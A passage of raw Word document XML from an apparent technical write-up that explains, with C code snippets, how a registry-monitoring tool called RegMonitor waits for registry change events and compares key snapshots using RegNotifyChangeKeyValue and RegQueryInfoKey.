          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>variable store information for which activity to be monitored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1D4D" w:rsidRDefault="005B1D4D" w:rsidP="005B1D4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>hEvent: An Event Handle for RegNotifyChangeKeyValue to capture for registry event.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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// Create an event.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hEvent = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateEvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w: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(hEvent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"Error in CreateEvent (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, GetLastError());</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Watch the registry key for a change of value.</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lErrorCode </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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegNotifyChangeKeyValue(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hKey, </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TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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dwFilter, </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hEvent, </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TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>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lErrorCode !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>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"Error in RegNotifyChangeKeyValue (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lErrorCode);</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5B1D4D" w:rsidRDefault="005B1D4D" w:rsidP="005B1D4D">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p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="005B1D4D">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D72550" w:rsidRDefault="00D72550" w:rsidP="005B1D4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegMonitor stands still and waits for registry event happen by using hEvent specified by RegNotifyChangeKeyValue.</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Wait for an event to occur.</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"Waiting for a change in the specified key...\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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WaitForSingleObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hEvent, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>INFINITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WAIT_FAILED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</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"Error in WaitForSingleObject (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, GetLastError());</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5B1D4D"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"\nChange has occurred.\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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D92F46" w:rsidRDefault="00541694" w:rsidP="00D92F46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When WaitForSingleObject return, if the return value is not WAIT_FAILED (which is set to 0xFFFFFFFF), there could have been an event happened in the registry database. RegMonitor calls RegQuery for capturing another snapshot, and comparing it with the previous one to identify change which takes place.</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xml:space="preserve">//Snapshot Registry in case event occurs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RegQuery(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hKey,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&amp;nSubKeys,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&amp;nValues,</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This value is now set to TRUE</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Indicating there was change happened</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TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">,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achMainKey,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achSubKey,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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">lpLastSubkeyName,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lpLastValueName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541694" w:rsidRDefault="00541694" w:rsidP="00541694">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p>
    <w:p w:rsidR="00541694" w:rsidRDefault="00541694" w:rsidP="00541694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A77FD" w:rsidRDefault="000A77FD" w:rsidP="00541694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A77FD" w:rsidRDefault="000A77FD" w:rsidP="000A77FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A77FD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>RegQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA32A4" w:rsidRDefault="00BA32A4" w:rsidP="000A77FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery is a function for querying the information stored in a specified registry key.</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int</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RegQuery(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hKey</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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nSubKeys</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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nValues</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bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</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const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>achMainKey</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const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>achSubKey</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t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastSubkeyName</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t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastValueName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A77FD" w:rsidRDefault="00BA32A4" w:rsidP="00BA32A4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00BA32A4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA32A4" w:rsidRDefault="00320ED1" w:rsidP="00BA32A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Using a Windows API called “RegQueryInfoKey” for getting information from</w:t>
      </w:r>
      <w:r w:rsidR="00A3196D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry key.</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retCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegQueryInfoKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">,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key handle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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">achClass,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buffer for class name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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cchClassName,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size of class string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reserved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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cSubKeys,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number of subkeys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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cbMaxSubKey,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longest subkey size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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cchMaxClass,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longest class string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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cValues,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number of values for this key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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cchMaxValue,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longest value name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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cbMaxValueData,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longest value data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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cbSecurityDescriptor,   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// security descriptor </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        &amp;ftLastWriteTime</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">);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last write time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00320ED1">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">That API returns </w:t>
      </w:r>
      <w:r w:rsidR="00A3196D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2 valuable information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cSubKeys: The number of current subkeys belong to that key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cValues: The number of current values belong to that key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">RegQuery identifying changing to the specified registry key by performing 2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>step</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
